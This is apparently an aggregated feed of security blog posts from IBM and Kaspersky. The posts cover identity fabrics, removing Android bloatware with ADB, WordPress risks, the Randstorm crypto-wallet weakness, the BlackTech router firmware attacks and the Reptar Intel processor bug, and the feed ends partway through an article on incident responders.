Taking the complexity out of identity solutions for hybrid environments

For the past two decades, businesses have been making significant investments to consolidate their identity and access management (IAM) platforms and directories to manage user identities in one place. However, the hybrid nature of the cloud has led many to realize that this ultimate goal is a fantasy. Instead, businesses must learn how to consistently and effectively manage user identities across multiple IAM platforms and directories.

As cloud migration and digital transformation accelerate at a dizzying pace, enterprises are left with a host of new identity challenges that many aren’t prepared to deal with. The proliferation of diverse cloud environments, each with its own identity solutions, coupled with the complexities of legacy systems, has resulted in fragmented and siloed identity services. That is where the identity fabric comes in.

The challenge of hybrid identity

Most environments are comprised of a mixture of multiple cloud and on-premise (on-prem) applications and systems. Though many are moving to modern Software-as-a-Service (SaaS) solutions, on-prem IAM products are often deeply embedded in mission-critical systems of organizations. They can’t simply be unplugged and replaced with modernized IAM solutions without risking significant business disruption, loss of data continuity, potential security risks and single points of failure.

Additionally, many modern IAM solutions struggle to meet the complex requirements of large, multi-layered organizations, including user role management, compliance with industry-specific regulations and integration with existing IT infrastructure. It has become painfully evident that a one-size-fits-all IAM system doesn’t exist, forcing organizations to use a combination of IAM systems across hybrid clouds and on-prem. A recent Osterman Research Report found that 52% of organizations stated that addressing identity access challenges in hybrid and multi-cloud environments was a critical initiative for them over the next year.

Managing identity fragmentation

As identity services multiply across hybrid cloud environments, organizations struggle to manage and enforce consistent user policies, comply with changing regulations, gain holistic visibility and mitigate user-related risks. Legacy applications remain tethered to legacy identity solutions, creating an inconsistent user experience without a single authoritative source for a user’s identity. Osterman research showed the top identity initiative for the next twelve months for 64% of the responding organizations was extending cloud identity capabilities to on-prem applications.

What is an identity fabric?

Businesses need a versatile solution that complements existing identity solutions while effectively integrating the various IAM silos that organizations have today into a cohesive whole. To provide consistent security policies and a better user experience, businesses require the ability to quickly audit all authentication workflows, layer intelligence to automate data-driven decisions and empower artificial intelligence (AI) and machine learning (ML) across legacy and on-prem applications in hybrid cloud deployments.

This is where an identity fabric comes into play: to bridge the gap between legacy identity infrastructure and modern cloud-based IAM systems. An identity fabric aims to integrate and enhance existing solutions rather than replace them. The goal is to create a less complex environment where consistent security authentication flows and visibility can be enforced. This approach aligns with our strategy of “taking the complexity out of identity solutions for hybrid environments.”

Learn more about identity fabric

Providing the foundation for an identity fabric

We have found that there are some fundamental building blocks to delivering an effective identity fabric:

The first step is to eliminate the identity silos by creating a single, authoritative directory. It’s critical that this directory be vendor-agnostic so it can stitch together all of your directories to create a single source of truth, management and enforcement. IBM Security Verify Directory offers flexibility, efficiency and scalability across on-prem, cloud and hybrid environments, providing smooth and secure access control.
The next step is to extend modern authentication mechanisms to your legacy applications, which are often abandoned due to the need for more funding, time and/or skills to modify existing application authentication flows. IBM’s Application Gateway is a product-agnostic gateway designed to bridge the gap between legacy and modern apps and systems with no-code integrations that allow legacy applications to take advantage of modern and advanced authentication capabilities, helping to reduce risk and improve regulatory compliance.
The third step incorporates behavioral risk-based authentication for modern and legacy applications. Regardless of the IAM solutions in use, risk-based authentication solutions enable a continuous assessment of risk levels at the time of access. Verify Trust introduces dynamic risk-based authentication, enhancing security without requiring a complete system overhaul. Powered by AI, Verify Trust delivers accurate and continuous risk-based access protection against the latest account takeover techniques by combining global intelligence, user behavioral biometrics, authentication results, network data, account history and a range of device risk detection capabilities.

Explore the Verify family

Orchestration holds your identity fabric together

Orchestration is the integration glue to an identity fabric. Without it, building an identity fabric would be resource-intensive. Orchestration allows more intelligent decision-making and simplifies onboarding and offboarding. It enables you to build consistent security policies while taking the burden off your administrators as you quickly and easily automate processes at scale.

For example, you have a legacy application with a homegrown identity system. The people who wrote it have long since left. Orchestration enables you to create a workflow so that when a user logs in to the system, it automatically creates a user account on the preferred modern identity solution with low code or no code identity orchestration. When users return to that homegrown application, they will automatically access it with a modern authentication mechanism.

Effective identity orchestration allows you to achieve simplicity in legacy and modern application coexistence, remove the burden of identity solution proliferation, consolidate identity silos, reduce identity solution vendor lock-in and simplify identity solution migrations by allowing for highly customizable flows with little-to-no code across identity solutions.

Take the next step in identity solutions

Whether you are an organization looking for workforce access, customer IAM, privileged access or governance identity solutions, or looking to build an identity fabric with your existing identity solutions, IBM Security Verify takes the complexity out of identity solutions for hybrid environments, emphasizing innovation and customer-centricity. We invite all stakeholders to join us on this transformative journey as we shape the future of IAM. Together, we will simplify identity solutions for the ever-evolving world of hybrid environments.

Join us for a webinar to learn more.

The post Taking the complexity out of identity solutions for hybrid environments appeared first on Security Intelligence.

Security Intelligence – ​Read More

How to stop, disable, and remove any Android apps — even system ones | Kaspersky official blog

Most smartphones have an average of around 80 installed apps, of which at least 30% are never used since most are forgotten about. But such “ballast” is harmful: there’s less free space on the device; potential bugs and compatibility issues multiply; and even unused apps at times distract you with pointless alerts.

To make things worse, abandoned apps can continue collecting data about the phone and its owner and feed it to advertising firms, or simply gobble up mobile data. Hopefully, we’ve already convinced you to “debloat” your smartphone at least a couple of times a year and uninstall apps you haven’t used for ages — not forgetting to cancel any paid subscriptions to them!

But, unfortunately, some apps are vendor-protected against uninstallation, and so aren’t all that easy to jettison. Thankfully, there are some ways to get round this problem…

Uninstall the app

Sometimes you can’t find an unwanted app under the Manage apps & device tab of the Google Play app. First, try to remove it through the phone settings: look there for the Apps section. This lists all installed programs and has a search feature to save you from having to scroll through them all. Having found the unwanted app and tapping it, you’re taken to the App Info screen. Here you can view the app’s mobile data, battery, and storage consumption, and, most importantly, find and tap the Uninstall button. If the button is there and active, the job’s done.

List of all installed apps and the App Info screen with the Uninstall button

Disable the app

If the app was installed on the phone by the vendor, it’s likely to be non-removable and have no Uninstall button on the App Info screen. That said, it’s not necessarily linked to the OS or core components of the smartphone — it could be, say, a Facebook client or a proprietary browser. Such apps are often called bloatware since they bloat the phone’s firmware and the list of standard apps. The easiest way to disable such apps is on the above-mentioned App Info screen; instead of Uninstall, the relevant button will be marked Disable. A disabled app is not much different from an uninstalled one — it vanishes from the set of icons on the startup screen and won’t run manually or when the phone boots up. Should you need it later, you can easily turn it back on with a single tap on that same App Info screen.

Disabling reduces the risk of data leakage, but does nothing to save storage space — unfortunately, the disabled app continues to take up memory on your phone. If you absolutely have to uninstall it — but there’s no Uninstall button — read on!…

For non-removable apps, instead of an Uninstall button, the App Info screen shows a Disable button

Stop the app

But what if the Disable button on the App Info screen is grayed out and untappable? For especially important programs, vendors take care to block the disabling option — often for a good reason (they’re vital to the system) — so you need to think very carefully before trying to disable or uninstall such apps manually. Open your favorite search engine and punch in the query “exact smartphone model number + exact app name”. Most likely you’ll see Android user forum discussions at the top of the search results. These often give information about whether the given app is safe to disable or whether there could be any side effects.

To perform a harmless experiment with an app that can’t be disabled, you can use the Force Stop button. This is the second button on that App Info screen and it’s almost always active — even for apps that can’t be disabled. Force Stop simply stops the app temporarily, without attempting to remove or permanently disable it. However, it no longer consumes power or mobile data — and can no longer spy on you. And if your phone continues to work as normal, then perhaps the app isn’t that important after all.

But stopped apps can start up again when certain events occur or after a phone restart, and stopping them manually each time — moreover regularly — can be troublesome and inconvenient. Fortunately, you can automate this task with the Greenify app. It doesn’t require superuser rights to work, but merely automates navigating to the now-familiar App Info screen and tapping the Force Stop button. You simply supply Greenify with a list of unwanted apps and set a Force Stop schedule to, say, twice a day. Other tools offer similar functionality, but Greenify’s advantage is its lack of “extra” features.

If the Disable button is inactive, try using Force Stop

Freeze or uninstall the app despite its objections

If you tested stopping a non-removable app and suffered no negative effects, you might consider freezing it or removing it altogether. Freezing is the same as disabling but is done using different tools. Before delving into the details, note that freezing requires technical skill and the activation of Developer mode on your phone. This mode itself creates certain information security risks by allowing connections to the phone via USB or LAN in special technical modes, plus the ability to view and modify its contents. Although Google has fenced off this functionality with many safeguards (permission requests, additional passwords, and so on), the room for error (thus creating risks) is high.

One more thing: before you start tinkering, be sure to create the fullest possible backup of your smartphone data.

If all of the above hasn’t scared you off, see the guide in the box.

Freezing and uninstalling non-removable Android apps in Developer mode

Download and install Android SDK Platform-Tools on your computer. Of the tools inside, you’ll only need the Android Debug Bridge USB driver and the ADB command line.
Enable Developer mode on your phone. The details vary slightly from vendor to vendor, but the general recipe is roughly the same: repeatedly tap the Build Number option in the About Phone.
Enable USB Debugging under Developer Settings on your smartphone. There are multiple options there — but don’t touch any apart from these two!
Connect your smartphone to your computer through USB.
Allow Debug mode on your phone screen.
Test Debug mode by getting a list of all packages (what developers call apps) installed on your phone. To do so, type the following in the ADB command line
adb shell pm list packages
The response will be a long list of packages installed on the phone, in which you need to find the name of the unwanted app. This might look something like facebook.katana or com.samsung.android.bixby.agent. You can often (but not always) tell which app is which by their names.
Freeze (disable) the unwanted app using the ADB command line. To do so, enter the command
adb shell pm disable-user –user 0 PACKAGENAME ,
where PACKAGENAME is the name of the unwanted app package. Different vendors may have different usernames (0 in our example), so check the correct PM command for your smartphone. As before, an online search helps out: “phone model + Debloat” or “phone model + ADB PM”.
You can use developer commands to not only disable an app but also completely uninstall it. To do so, replace the previous command with adb shell pm uninstall –user 0 PACKAGENAME
Restart your phone.

The free Universal Android Debloater tool somewhat simplifies all this sorcery. It issues ADB commands automatically, based on the “cleaning packages” selected from the menu, which are prepared with both the vendor and model in mind. But since this is an open-source app written by enthusiasts, we can’t vouch for its efficacy.

Kaspersky official blog – ​Read More

What security issues does WordPress have? | Kaspersky official blog

WordPress is the world’s most popular content management system. As its developers like to point out, over 40% of all websites are built on WordPress. However, this popularity has its downside: such a huge number of potential targets inevitably attracts malicious actors. For this very reason, cybersecurity researchers carefully investigate WordPress and regularly report various problems with this CMS.

As a result, it’s not uncommon to hear that WordPress is full of security issues. But all this attention has a positive side to it: most of the threats and the methods to combat them are well known, making it easier to keep your WordPress site safe. That’s what we’ll be discussing in this article.

1. Vulnerabilities in plugins, themes, and the WordPress core (in that order of descending importance)

In all the lists of WordPress security issues available on the internet, it’s things like XSS (cross-site scripting), SQLi (SQL injection), and CSRF (cross-site request forgery) keep popping up. These attacks, alongside various others, are made possible due to vulnerabilities in either the WordPress core software, its plugins or themes.

It’s important to note that, statistically, only a small fraction of the vulnerabilities are found in the WordPress core itself. For example, for the whole of 2022, a mere 23 vulnerabilities were discovered in the WordPress core software — which is 1.3% of the total 1779 vulnerabilities found in WordPress that year. Another 97 bugs (5.45%) were discovered in themes. Meanwhile, the lion’s share of vulnerabilities were found in plugins: 1659 — making up 93.25% of the total.

It’s worth mentioning that the number of vulnerabilities discovered in WordPress should not be a reason to avoid using this CMS. Vulnerabilities exist everywhere; they’re just found most frequently where they’re most actively sought — in the most popular software.

How to improve security:

Always update the WordPress core promptly. Though vulnerabilities are not found as often here, they are exploited more intensively, so leaving them unpatched is risky.
Remember to update themes — especially plugins. As mentioned, plugins are responsible for the vast majority of known vulnerabilities in the WordPress ecosystem.
Avoid installing unnecessary WordPress plugins — those that your site doesn’t need to operate. This will significantly reduce the number of potential vulnerabilities on your WordPress site.
Promptly deactivate or entirely remove plugins you no longer need.

2. Weak passwords and lack of two-factor authentication

The second major security issue with WordPress is the hacking of sites using simple password guessing (brute-forcing) or compromised usernames and passwords (credential stuffing) from ready-made databases, which are collected as a result of leaks from some third-party services.

If an account with high privileges is compromised, attackers can gain control of your WordPress site and use it for their own purposes: stealing data, discreetly adding to your texts links to the resources they promote (SEO spam), installing malware (including web skimmers), using your site to host phishing pages, and so on.

How to improve security:

Ensure strong passwords for all users of your WordPress site. To achieve this, it’s good to apply a password policy — a list of rules that passwords must satisfy. There are plugins available that let you implement password policies on your WordPress site.
Limit the number of login attempts — again, there are plenty of plugins for this purpose.
Enable two-factor authentication using one-time codes from an app. And again, there are WordPress plugins for this.
To prevent your WordPress users from having to remember long and complex passwords, encourage them to install a password manager. By the way, our [KPM placeholder]Kaspersky Password Manager[/placeholder] also lets you use one-time codes for two-factor authentication.

3. Poor control over users and permissions

This issue is connected to the previous one: often, owners of WordPress sites don’t manage the permissions of their WordPress users carefully enough. This significantly increases risk if a user account gets hacked.

We’ve already discussed the potential consequences of an account with high access rights being compromised — including those access rights issued mistakenly or “for growth”: SEO spam injection into your content, unauthorized data access, installing malware, creating phishing pages, and so on.

How to improve security:

Be extremely careful when assigning permissions to users. Apply the principle of least privilege — grant users only the access rights they absolutely need for their tasks.
Regularly review your list of WordPress users, and remove any accounts that are no longer necessary.
Move users to less privileged categories if they no longer need elevated permissions.
Of course, the advice from point 2 also applies here: use strong passwords and enable two-factor authentication.

4. Malicious plugins

Aside from plugins that are “just” vulnerable, there are also outright malicious ones. For example, not long ago, researchers discovered a WordPress plugin masquerading as a page-caching plugin but which was actually a full-fledged backdoor. Its main function was to create illegal administrator accounts and gain complete control over infected sites.

Earlier this year, researchers found another malicious WordPress plugin, which was originally legitimate but had been abandoned by developers over a decade ago. Some bleeding hearts picked it up and turned it into a backdoor — allowing them to gain control over thousands of WordPress sites.

How to improve security:

Avoid installing unnecessary WordPress plugins. Only install the ones truly essential for your site’s operation.
Before installing a plugin, read its user reviews carefully — if a plugin does something suspicious, chances are someone’s already noticed it.
Deactivate or remove plugins you no longer use.
There are plugins that scan WordPress sites for malware. However, keep in mind they can’t be completely trusted: many of the latest instances of WordPress malware can deceive them.
If your WordPress site is behaving strangely and you suspect it’s infected, consider contacting specialists for a security audit.

5. Unrestricted XML-RPC Protocol

Another vulnerability specific to WordPress is the XML-RPC protocol. It’s designed for communication between WordPress and third-party programs. However, back in 2015, WordPress introduced support for the REST API, which is now more commonly used for application interaction. Despite this, XML-RPC is still enabled by default in WordPress.

The problem is that XML-RPC can be used by attackers for two types of attacks on your site. The first type is brute-force attacks aimed at guessing passwords for your WordPress user accounts. With XML-RPC, attackers can combine multiple login attempts into a single request, simplifying and speeding up the hacking process. Secondly, the XML-RPC protocol can be used to orchestrate DDoS attacks on your WordPress website through so-called pingbacks.

How to improve security:

If you don’t plan on using XML-RPC in the near future, it’s best to disable it on your WordPress site. There are several ways to do this. If you need this functionality later, it’s not difficult to re-enable it.
If you intend to use XML-RPC, it’s advisable to configure its restrictions, which can be done using WordPress plugins.
Also, to protect against brute-force attacks, you can follow the advice from point 2 of this article: use strong passwords, enable two-factor authentication, and use a password manager. By the way, this is included in the license of our product designed for protecting small businesses — Kaspersky Small Office Security.

Kaspersky official blog – ​Read More

Vulnerability in crypto wallets created online in the early 2010s | Kaspersky official blog

Researchers have discovered several vulnerabilities in the BitcoinJS library that could leave Bitcoin wallets created online a decade ago prone to hacking. The basic issue is that the private keys for these crypto wallets were generated with far greater predictability than the library developers expected.

Randstorm vulnerabilities and consequences

Let’s start at the beginning. Researchers at Unciphered, a company specializing in crypto wallet access recovery, discovered and described a number of vulnerabilities in the BitcoinJS JavaScript library used by many online cryptocurrency platforms. Among these services are some very popular ones — in particular, Blockchain.info, now known as Blockchain.com. The researchers dubbed this set of vulnerabilities Randstorm.

Although the vulnerabilities in the BitcoinJS library itself were fixed back in 2014, the problem extends to the results of using this library: crypto wallets created with BitcoinJS in the early 2010s may be insecure — in the sense that it’s far easier to find their private keys than the underlying Bitcoin cryptography assumes.

The researchers estimate that several million wallets, totaling around 1.4 million BTC, are potentially at risk due to Randstorm. Among the potentially vulnerable wallets, according to the researchers, 3–5% of them are actually vulnerable to real attacks. Based on the approximate Bitcoin exchange rate of around $36,500 at the time of posting, this implies total loot of $1.5-2.5 billion for attackers who can successfully exploit Randstorm.

The researchers claim that the Randstorm vulnerabilities can indeed be used for real-world attacks on crypto wallets. What’s more, they successfully exploited these vulnerabilities to restore access to several crypto wallets created on Blockchain.info before March 2012. For ethical reasons, they didn’t publish a proof-of-concept of the attack, as this would have directly exposed tens of thousands of crypto wallets to the risk of theft.

The researchers have already contacted the online cryptocurrency services known to have used vulnerable versions of the BitcoinJS library. In turn, these services notified customers who could potentially be affected by Randstorm.

The nature of Randstorm vulnerabilities

Let’s look in more detail at how these vulnerabilities actually work. At the heart of Bitcoin wallet security lies the private key. Like any modern cryptographic system, Bitcoin relies on this key being secret and uncrackable. Again, as in any modern cryptographic system, this involves the use of very long random numbers.

And for the security of any data protected by the private key, it must be as random as can possibly be. If the number used as a key is highly predictable, it makes it easier and quicker for an attacker armed with information about the key-generation procedure to brute-force it.

Bear in mind that generating a truly random number is no stroll in the park. And computers by their very nature are extremely unsuited to the task since they’re too predictable. Therefore, what we usually have are pseudo-random numbers, and to increase the entropy of the generation (cryptographer-speak for the measure of unpredictability) we rely on special functions.

Now back to the BitcoinJS library. To obtain “high-quality” pseudo-random numbers, this library uses another JavaScript library called JSBN (JavaScript Big Number), specifically its SecureRandom function. As its name suggests, this function was designed to generate pseudo-random numbers that qualify for use in cryptography. To increase their entropy, SecureRandom relies on the browser function window.crypto.random.

Therein lies the problem: although the window.crypto.random function existed in the Netscape Navigator 4.x browser family, these browsers were already obsolete by the time web services began actively using the BitcoinJS library. And in the popular browsers of those days — Internet Explorer, Google Chrome, Mozilla Firefox, and Apple Safari — the window.crypto.random function was simply not implemented.

Unfortunately, the developers of the JSBN library failed to make provision for any kind of check or corresponding error message. As a result, the SecureRandom function passed over the entropy increment step in silence, effectively handing the task of creating private keys to the standard pseudo-random number generator, Math.random.

This is bad in and of itself because Math.random is not cut out for cryptographic purposes. But the situation is made even worse by the fact that the Math.random implementation in the popular browsers of 2011–2015 —  in particular Google Chrome — contained bugs that resulted in even less random numbers than should have been the case.

In turn, the BitcoinJS library inherited all the above-mentioned issues from JSBN. As a result, platforms that used it to generate private keys for crypto wallets got much fewer random numbers from the SecureRandom function than the library developers expected. And since these keys are generated with great predictability, they’re much easier to brute-force — allowing vulnerable crypto wallets to be hijacked.

As mentioned above, this isn’t a theoretical danger, but rather a practical one — the Unciphered team was able to exploit these vulnerabilities to restore access to (in other words, ethically hack) several old crypto wallets created on Blockchain.info.

Randstorm: who’s at risk?

BitcoinJS utilized the vulnerable JSBN library right from its introduction in 2011 through 2014. Note, however, that some cryptocurrency projects may have been using an older-than-latest version of the library for some time. As for the bugs afflicting Math.random in popular browsers, by 2016 they’d been fixed by changing the algorithms for generating pseudo-random numbers. Together, this gives an approximate time frame of 2011–2015 for when the potentially vulnerable crypto wallets were created.

The researchers emphasize that BitcoinJS was very popular back in the early 2010s, so it’s difficult to compile a full list of services that could have used a vulnerable version of it. Their report gives a list of platforms they were able to identify as at risk:

BitAddress — still operational.
BitCore (BitPay) — still operational.
Bitgo — still operational.
info — still operational as Blockchain.com.
Blocktrail — redirects to https://btc.com or https://blockchair.com .
BrainWallet — dead.
CoinKite — now sells hardware wallets.
CoinPunk — dead.
Dark Wallet — redirects to https://crypto-engine.org .
DecentralBank — dead.
info (Block.io) — still operational.
EI8HT — dead.
GreenAddress — redirects to https://blockstream.com/green/ .
QuickCon — dead.
Robocoin — dead.
Skyhook ATM — redirects to https://yuan-pay-group.net .

Besides Bitcoin wallets, Litecoin, Zcash, and Dogecoin wallets may also be at risk, since there are BitcoinJS-based libraries for these cryptocurrencies, too. It seems natural to assume that these libraries could be used to generate private keys for the respective crypto wallets.

The Unciphered report describes a host of other intricacies associated with Randstorm. But what it all basically boils down to is that wallets created between 2011 and 2015 using the vulnerable library may be vulnerable to varying degrees — depending on the particular circumstances.

How to protect against Randstorm

As the researchers themselves rightly state, this isn’t a case where fixing the vulnerability in the software would suffice: “patching” wallet owners’ private keys and replacing them with secure ones just isn’t doable. So, despite the fact that the bugs have long been fixed, they continue to affect the crypto wallets that were created when the above-discussed errors plagued the BitcoinJS library. This means that vulnerable wallet owners themselves need to take protective measures.

Because the task of drawing up a complete list of cryptocurrency platforms that used the vulnerable library is difficult, it’s better to play it safe and consider any crypto wallet created online between 2011 and 2015 to be potentially insecure (unless you know for sure that it’s not). And naturally, the fatter the wallet — the more tempting it is to criminals.

The obvious (and only) solution to the problem is to create new crypto wallets and move all funds from potentially vulnerable wallets to them.

And since you have to do this anyway, it makes sense to proceed with the utmost caution this time. Crypto protection is a multi-step process, for which reason we’ve put together a comprehensive checklist for you with loads of additional information accessible through links:

Explore the main crypto threats and protection methods in detail.
Understand the differences between hot and cold crypto wallets, and the most common ways they are attacked.
Use a hardware (cold) wallet for long-term storage of core crypto assets, and a hot wallet with minimal funds for day-to-day transactions.
Before transferring all funds from the old wallet to the new one, equip all your devices with reliable protection. It will guard your smartphone or computer against Trojans looking to steal passwords and private keys or clippers that substitute crypto wallet addresses in the clipboard, as well as protect your computer from malicious crypto miners and unauthorized remote access.
Never store a photo or screenshot of your seed phrase on your smartphone, never post your seed phrase in public clouds, never send it through messengers or email, and don’t enter it anywhere except when recovering a lost private key.
Securely store your private key and the seed phrase for its recovery. This can be done using the Identity Protection Wallet in Kaspersky Premium, which encrypts all stored data using AES-256. The password for it is stored nowhere except in your head (unless, of course, it’s on a sticky note attached to your monitor) and is unrecoverable — so the only one with access to your personal documents is you.
Another option is to use a cold crypto wallet that doesn’t require a seed phrase to back up the private key. This is how, for example, the Tangem hardware wallet works.

Kaspersky official blog – ​Read More

How to protect corporate routers and firewalls against hacking | Kaspersky official blog

Devices on the border between the internet and an internal corporate network — especially those responsible for security and network traffic management — are often a priority target for attackers. They arouse no suspicion when sending large volumes of traffic outward, and at the same time have access to the organization’s resources and to a significant portion of internal traffic. Note also that network activity logs are often generated and stored on these devices, so if the router is compromised, attackers can just erase traces of their malicious activity.

This is why router compromise has become the crown jewels of big-name APTs such as Slingshot, APT28, and Camaro Dragon. But these days far less sophisticated actors can utilize it too, especially if the target company uses outdated, unofficially supported, or small/home office router models.

Attacks on routers and firewalls typically exploit vulnerabilities, which are discovered, alas, with great regularity. Sometimes such vulnerabilities are so serious — yet also so handy for attackers — that some experts wonder whether the backdoors might have been placed in the respective device firmware deliberately. But even if all known vulnerabilities are fixed, various configuration errors, or just incurable features of older router models, can lead to infection. U.S. and Japanese cybersecurity agencies recently published a detailed advisory on an advanced attack of this kind, centered on the activities of the BlackTech (aka T-APT-03, Circuit Panda, and Palmerworm) APT group. The analysis covers the group’s TTP within the infected network, but our focus will be on the most interesting aspect of the report — the malicious firmware.

BlackTech attack on the weak link in corporate defenses

The attack begins with an assault on the target company by infiltrating one of its regional branches. BlackTech actors employ traditional tactics for this, from phishing to exploiting vulnerabilities — with the router attack not yet underway. They take advantage of the fact that branch offices often use simpler hardware and have less rigid IT and infosec policies.

BlackTech then expands its presence in the branch’s network and obtains administrative credentials for the router or firewall. Armed with these, the intruders reflash the edge device with malicious firmware and use its trusted status to launch an attack on the headquarters.

Router compromise mechanics

First, legitimate but outdated firmware is loaded onto the device. Right after rebooting, the hackers modify the program loaded into the device RAM (by hot patching) to disable security features that would normally prevent loading of the modified components (ROMmon). It’s to perform this trick that the old version of the firmware must first be run. After disabling the ROMmon, the modified firmware (and in some cases a modified device bootloader) is uploaded to the router. After another reboot, the router is fully under the attackers’ control.

The modified firmware listens to traffic in anticipation of the “magic” packet that will activate the backdoor. On receipt of this packet, the device gives the attackers full control over its functions, despite them not being on the Access Control List, and allows connection to an SSH session with a specific username but without requiring a password. This user’s actions aren’t logged.

How attackers exploit the router

Malicious router firmware not only provides the intruders with a secure foothold in the target network, but also helps solve a whole range of tactical problems by:

Concealing configuration changes;
Not logging attacker commands and actions;
Blocking execution of some legitimate commands in the router console, hindering incident investigation.

The report focuses on malicious firmware for Cisco routers on the IOS platform, but mentions that BlackTech compromises other models of network equipment in a similar manner. We should add that previous incidents of edge-device compromise affected the Fortinet, SonicWall, TP-Link, and Zyxel brands.

Countering attacks on routers and firewalls

Clearly, an organization is at risk if it uses outdated models of edge network-devices, outdated firmware, or unofficial firmware (this applies not only to Cisco equipment). However, even a new router with fresh firmware can become a useful tool for an attacker, so the various recommendations of the report authors are worth implementing in every network.

Place administrative systems on a separate virtual local area network (VLAN). Block all unauthorized traffic from network devices destined for non-administrative VLANs.

Limit access to administration services to the IP addresses of authorized administrators. Access lists can be applied to all virtual teletype (VTY) lines and specific administrative services. For Cisco routers, it’s recommended to restrict communication with external systems for VTYs using the “transport output none” command.

Monitor both successful and unsuccessful attempts at accessing router administration.

Regularly review network device logs for events such as unexpected reboots, OS version changes, configuration changes, or firmware update attempts. Cross-check against the IT department’s software update plans to ensure each event has been authorized.

Monitor “strange” incoming and outgoing network connections from edge devices. Normally, network devices share routing and network topology information only with nearby devices, and administration, monitoring, authentication, and time synchronization are conducted only with a small number of administrative computers.

Change all passwords and keys at the slightest suspicion that even one password has been compromised.

Upgrade the hardware. Perhaps the most difficult and frustrating of the recommendations. Organizations using outdated models that don’t support secure boot technologies are advised to plan and budget for upgrading this hardware in the shortest time possible. When choosing new equipment, preference should be given to vendors that implement secure development methodologies and a secure-by-design approach.

Kaspersky official blog – ​Read More

Reptar: a vulnerability in Intel processors | Kaspersky official blog

On November 14, Google released a bulletin reporting a serious vulnerability in a number of Intel processors — starting from the Ice Lake generation released in 2019. Potentially this vulnerability can lead to denial of service, privilege escalation, or disclosure of sensitive information. At the time of writing, microcode updates addressing the issue have been released for the 12th and 13th generation Intel processors (Alder Lake and Raptor Lake, respectively). Patches for 10th and 11th generation processors (Ice Lake and Tiger Lake) are in progress. The full list of affected processors is available on the Intel website in the form of an extensive spreadsheet.

According to Intel representatives, the company’s engineers were aware of the processors’ abnormal behavior, but the issue was considered non-critical, and plans to resolve it were postponed to the first half of 2024. However, the situation changed when Google researchers discovered the problem independently. In fact, all of the details about the vulnerability actually come from Google specialists, specifically from this article by Tavis Ormandy.

Processor fuzzing

Tavis Ormandy has discovered numerous major vulnerabilities in various programs and devices. Recently, we wrote about his previous research that found the Zenbleed vulnerability in AMD processors. On that occasion, Tavis talked about adopting fuzzing to find hardware vulnerabilities.

Fuzzing is a testing method that involves feeding random information into the input of the information system being tested. Usually, it’s used to automate the search for software vulnerabilities: a special fuzzing tool is created to interact with the program and monitor its state. Subsequently, tens or hundreds of thousands of tests are conducted to identify unusual behavior in the tested code.

When it comes to testing processors, things are a bit more complicated. We have to generate random programs that operate with no failures of their own and run them on the processor. How can we differentiate normal processor behavior from abnormal behavior in such a case? After all, not every error during software execution leads to a crash. Ormandy proposed a technique in which the same “random” code is simultaneously executed on different processors. Theoretically, the output of an identical program should also be identical; if it isn’t, it could indicate a problem. It was this approach that revealed the vulnerability in the Intel processors.

Useless but dangerous code

To understand how the Reptar vulnerability works, we need to go down to the lowest level of programming — the machine code that processors execute directly. Assembly language is used to represent such basic instructions in a more convenient way. A snippet of assembly language code looks something like this:

Example of code in assembly language. The last line contains a prefix that modifies execution of the instruction following it. Source

The last line features the movsb instruction, which tells the processor to move data from one memory area to another. It’s preceded by the rep modifier, which indicates that the movsb command should be executed several times in a row. Such prefixes are not relevant for all instructions. Intel processors know how to skip meaningless prefixes. Tavis Ormandy gives an example:

Multiple repeated prefixes won’t cause an error when executing the program. Source

Let’s add another prefix, the so-called rex.rxb. It was introduced alongside the x86-64 architecture to handle eight additional processor registers. Although what exactly it does is not that important — all we need to know is that this prefix doesn’t make sense when used with the movsb command:

In theory, the rex.rxb prefix should be skipped, and only the movsb command with the rep prefix executed. But in practice, this isn’t the case for Intel processors. Source

In fact, this prefix changes the behavior of Intel processors (starting from Ice Lake), although it shouldn’t. In this generation of processors, a technology called “Fast Short Repeat Move” was added. It’s designed to accelerate operations involving data movement in RAM. Among other things, this technology can optimize the execution of the rep movsb instruction. Along with the “Fast Short Repeat Move” feature, a flaw crept into the processor’s logic, first discovered by Intel engineers and later by Google experts.

Immediate threat

What could executing this instruction, which disrupts the normal behavior of the processor, lead to? According to Ormandy, the results are unpredictable. The researchers observed execution of random code, parts of the program being ignored, and various failures in the processor, all the way up to complete failure. For the latter, one needs to somehow exploit the vulnerability on a pair of processor cores simultaneously. To check their own systems for this vulnerability, a team of Google researchers prepared a test program.

Unpredictable behavior is bad enough. The most important difference between this “processor bug” and all the others is that it directly threatens providers of virtual private server hosting services, or cloud solution providers in general. This industry is built on the ability to share a single powerful server among dozens or hundreds of clients — each managing their own virtual operating system. It’s crucial that under no circumstances should one client see another client’s data or the data of the host — the operating system managing the virtual containers.

Now imagine that a client can execute a program in their virtual OS that causes the host to crash. At the very least, this could enable a DoS attack on the provider. In fact, Ormandy didn’t present any other exploitation scenarios, citing the fact that it’s very difficult to predict the behavior of a processor operating in black-box mode; although it’s theoretically possible for an attacker to execute specific malicious code instead of relying on random failures. Intel representatives themselves acknowledge that “code execution” and “information disclosure” are possible. Therefore, it’s extremely important to install microcode updates prepared by Intel (for virtual hosting service providers at least).

Kaspersky official blog – ​Read More

What cybersecurity pros can learn from first responders

Though they may initially seem very different, there are some compelling similarities between cybersecurity professionals and traditional first responders like police and EMTs. After all, in a world where a cyberattack on critical infrastructure could cause untold damage and harm, cyber responders must be ready for anything.

But are they actually prepared? Compared to the readiness of traditional first responders, how do cybersecurity professionals in incident response stand up? Let’s dig deeper into whether the same sense of urgency exists in cyber and what security leaders can learn from first responders.

What first responders and cyber IR professionals have in common

Troy Bettencourt, Global Head of X-Force Incident Response at IBM, has responder experience at multiple levels, with a background including military, law enforcement and cybersecurity incident response. According to Bettencourt, there are many parallels between military, law enforcement and cybersecurity incident responders.

“A lot of the things that make military and law enforcement successful — or help contribute to their success — is constant training and drilling,” he said. “When you have an emergency incident, if you’re part of an internal team and something happens, you don’t have to expend a lot of mental energy on the tasks that should be routine.”

To be successful, much like the military and first responders, incident responders in the cyber industry must have clearly defined roles and real-world experience. For example, they shouldn’t have to think about how to do a search in their EDR platform or how to query firewall logs or a SIEM.

“That should be practiced all the time,” Bettencourt said. “If you’re training and drilling that all the time, then you’re not consuming your limited mental energy and creating high stress, and you’re reserving the mental energy for the actual valuable tasks.”

For Bettencourt and the X-Force team, standardization is also key. “We want to make sure we’re approaching our analysis in the same way, so that if you have 50 systems to analyze and you spread that workload, you know that the findings can be trusted, but they’re also complete and that items weren’t missed,” he said.

Challenges for the cyber industry

